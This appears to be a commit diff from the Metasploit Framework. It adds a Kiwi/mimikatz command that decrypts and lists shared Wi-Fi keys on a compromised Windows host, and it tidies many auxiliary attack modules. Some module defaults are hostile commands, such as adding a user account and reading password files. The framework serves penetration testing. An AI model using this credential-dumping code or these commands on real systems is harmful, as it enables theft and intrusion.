||||
db.emit(:service,[addr,service[:portnum]].join(":"),&block) if block
|
||||
db_report(:service,svc)
|
||||
end
|
||||
end
|
||||
|
||||
def report_web_site(url,&block)
|
||||
return unless in_tag("Crawler")
|
||||
return unless url
|
||||
|
|
|
@ -66,7 +66,7 @@ module Rex
|
|||
# @param len [Integer] An optional URI length value, including the leading slash
|
||||
# @return [String] The URI string for connections
|
||||
def generate_uri_uuid(sum, uuid, len=nil)
|
||||
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
|
||||
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN)
|
||||
curl_prefix = uuid.to_uri
|
||||
|
||||
if len
|
||||
|
|
|
@ -379,6 +379,57 @@ class Kiwi < Extension
|
|||
content.join('')
|
||||
end
|
||||
|
||||
#
|
||||
# Access and parse a set of wifi profiles using the given interfaces
|
||||
# list, which contains the list of profile xml files on the target.
|
||||
#
|
||||
# @return [Hash]
|
||||
def wifi_parse_shared(wifi_interfaces)
|
||||
results = []
|
||||
|
||||
exec_cmd('"base64 /in:off /out:on"')
|
||||
wifi_interfaces.keys.each do |key|
|
||||
interface = {
|
||||
:guid => key,
|
||||
:desc => nil,
|
||||
:state => nil,
|
||||
:profiles => []
|
||||
}
|
||||
|
||||
wifi_interfaces[key].each do |wifi_profile_path|
|
||||
cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
|
||||
output = exec_cmd(cmd)
|
||||
|
||||
lines = output.lines
|
||||
|
||||
profile = {
|
||||
:name => nil,
|
||||
:auth => nil,
|
||||
:key_type => nil,
|
||||
:shared_key => nil
|
||||
}
|
||||
|
||||
while lines.length > 0 do
|
||||
line = lines.shift.strip
|
||||
if line =~ /^\* SSID name\s*: (.*)$/
|
||||
profile[:name] = $1
|
||||
elsif line =~ /^\* Authentication\s*: (.*)$/
|
||||
profile[:auth] = $1
|
||||
elsif line =~ /^\* Key Material\s*: (.*)$/
|
||||
profile[:shared_key] = $1
|
||||
end
|
||||
end
|
||||
|
||||
interface[:profiles] << profile
|
||||
end
|
||||
|
||||
results << interface
|
||||
end
|
||||
exec_cmd('"base64 /in:on /out:on"')
|
||||
|
||||
results
|
||||
end
|
||||
|
||||
#
|
||||
# List all the wifi interfaces and the profiles associated
|
||||
# with them. Also show the raw text passwords for each.
|
||||
|
|
|
@ -72,7 +72,8 @@ class Console::CommandDispatcher::Kiwi
|
|||
'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)',
|
||||
'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)',
|
||||
'lsa_dump_sam' => 'Dump LSA SAM (unparsed)',
|
||||
'wifi_list' => 'List wifi profiles/creds',
|
||||
'wifi_list' => 'List wifi profiles/creds for the current user',
|
||||
'wifi_list_shared' => 'List shared wifi profiles/creds (requires SYSTEM)',
|
||||
}
|
||||
end
|
||||
|
||||
|
@ -303,37 +304,50 @@ class Console::CommandDispatcher::Kiwi
|
|||
end
|
||||
|
||||
#
|
||||
# Dump all the wifi profiles/credentials
|
||||
# Dump all the shared wifi profiles/credentials
|
||||
#
|
||||
def cmd_wifi_list_shared(*args)
|
||||
interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
|
||||
interfaces_dir = client.fs.file.expand_path(interfaces_dir)
|
||||
files = client.fs.file.search(interfaces_dir, '*.xml', true)
|
||||
|
||||
if files.length == 0
|
||||
print_error('No shared WiFi profiles found.')
|
||||
else
|
||||
interfaces = {}
|
||||
files.each do |f|
|
||||
interface_guid = f['path'].split("\\")[-1]
|
||||
full_path = "#{f['path']}\\#{f['name']}"
|
||||
|
||||
interfaces[interface_guid] ||= []
|
||||
interfaces[interface_guid] << full_path
|
||||
end
|
||||
results = client.kiwi.wifi_parse_shared(interfaces)
|
||||
|
||||
if results.length > 0
|
||||
display_wifi_profiles(results)
|
||||
else
|
||||
print_line
|
||||
print_error('No shared wireless profiles found on the target.')
|
||||
end
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Dump all the wifi profiles/credentials for the current user
|
||||
#
|
||||
def cmd_wifi_list(*args)
|
||||
results = client.kiwi.wifi_list
|
||||
|
||||
if results.length > 0
|
||||
results.each do |r|
|
||||
table = Rex::Text::Table.new(
|
||||
'Header' => "#{r[:desc]} - #{r[:guid]}",
|
||||
'Indent' => 0,
|
||||
'SortIndex' => 0,
|
||||
'Columns' => [
|
||||
'Name', 'Auth', 'Type', 'Shared Key'
|
||||
]
|
||||
)
|
||||
|
||||
print_line
|
||||
r[:profiles].each do |p|
|
||||
table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
|
||||
end
|
||||
|
||||
print_line(table.to_s)
|
||||
print_line("State: #{r[:state]}")
|
||||
end
|
||||
display_wifi_profiles(results)
|
||||
else
|
||||
print_line
|
||||
print_error('No wireless profiles found on the target.')
|
||||
end
|
||||
|
||||
print_line
|
||||
return true
|
||||
true
|
||||
end
|
||||
|
||||
@@creds_opts = Rex::Parser::Arguments.new(
|
||||
|
@ -401,6 +415,30 @@ class Console::CommandDispatcher::Kiwi
|
|||
|
||||
protected
|
||||
|
||||
def display_wifi_profiles(profiles)
|
||||
profiles.each do |r|
|
||||
header = r[:guid]
|
||||
header = "#{r[:desc]} - #{header}" if r[:desc]
|
||||
table = Rex::Text::Table.new(
|
||||
'Header' => header,
|
||||
'Indent' => 0,
|
||||
'SortIndex' => 0,
|
||||
'Columns' => [
|
||||
'Name', 'Auth', 'Type', 'Shared Key'
|
||||
]
|
||||
)
|
||||
|
||||
print_line
|
||||
r[:profiles].each do |p|
|
||||
table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
|
||||
end
|
||||
|
||||
print_line(table.to_s)
|
||||
print_line("State: #{r[:state] || 'Unknown'}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
|
||||
if client.sys.config.is_system?
|
||||
print_warning(msg)
|
||||
|
|
|
@ -58,7 +58,7 @@ class Console::CommandDispatcher::Stdapi::Net
|
|||
'-r' => [true, 'Forward: remote host to connect to.'],
|
||||
'-p' => [true, 'Forward: remote port to connect to. Reverse: remote port to listen on.'],
|
||||
'-R' => [false, 'Indicates a reverse port forward.'],
|
||||
'-L' => [true, 'Forward: local host to listen on (optional). Remote: local host to connect to.'])
|
||||
'-L' => [true, 'Forward: local host to listen on (optional). Reverse: local host to connect to.'])
|
||||
|
||||
#
|
||||
# Options for the netstat command.
|
||||
|
|
|
@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.24'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.28'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
@ -77,7 +77,7 @@ Gem::Specification.new do |spec|
|
|||
# Needed by anemone crawler
|
||||
spec.add_runtime_dependency 'nokogiri'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
spec.add_runtime_dependency 'packetfu', '1.1.13.pre'
|
||||
spec.add_runtime_dependency 'packetfu'
|
||||
# For sniffer and raw socket modules
|
||||
spec.add_runtime_dependency 'pcaprub'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -35,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
@ -61,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptBool.new('HIDE_IFRAME', [
|
||||
true, "Hide the exploit iframe from the user", true
|
||||
])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
|
||||
OptPath.new('FILE', [true, 'Image to upload and show']),
|
||||
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
|
||||
], self.class)
|
||||
])
|
||||
|
||||
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
|
||||
# so deregister them so we don't overwhelm the user with fake options.
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'uri'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
@ -42,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptInt.new('TIME', [true, 'Time in seconds to show the video', 60]),
|
||||
OptString.new('URL', [true, 'URL of video to show. Must use an IP address']),
|
||||
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
|
||||
], self.class)
|
||||
])
|
||||
|
||||
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
|
||||
# so deregister them so we don't overwhelm the user with fake options.
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'metasploit/framework/aws/client'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000),
|
||||
OptAddress.new('LHOST',
|
||||
OptAddressLocal.new('LHOST',
|
||||
[
|
||||
false,
|
||||
"The local IP address to accept the data connection"
|
||||
|
@ -67,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"backupexec_dump.mtf"
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -48,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"Compromised by Metasploit!\r\n"
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def auxiliary_commands
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
Opt::RPORT(8008)
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options([
|
||||
Opt::RPORT(8008),
|
||||
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -2,8 +2,6 @@
|
|||
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SNMPClient
|
||||
|
@ -46,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
|
||||
], self.class)
|
||||
])
|
||||
|
||||
deregister_options("VERSION")
|
||||
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -40,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('USERNAME', [true, 'Username to use', '']),
|
||||
OptString.new('PASSWORD', [true, 'Password to use', '']),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client
|
||||
|
@ -33,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
|
||||
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
|
||||
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
|
||||
], self.class )
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -31,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options([
|
||||
Opt::RPORT(8030),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
@ -104,7 +102,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8028),
|
||||
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3000),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3500),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
@ -50,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(5555),
|
||||
OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -42,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
Opt::RPORT(8080),
|
||||
OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),
|
||||
OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def get_service_desk_strong_name
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
@ -87,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"A URL to inject into a script tag in the context of the device web interface.",
|
||||
''
|
||||
])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -47,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
|
||||
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
|
||||
OptString.new('PATH', [ true, 'The file to read or delete', "\\windows\\win.ini" ])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'bcrypt'
|
||||
require 'digest'
|
||||
require 'openssl'
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
|
||||
OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8000),
|
||||
OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
||||
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue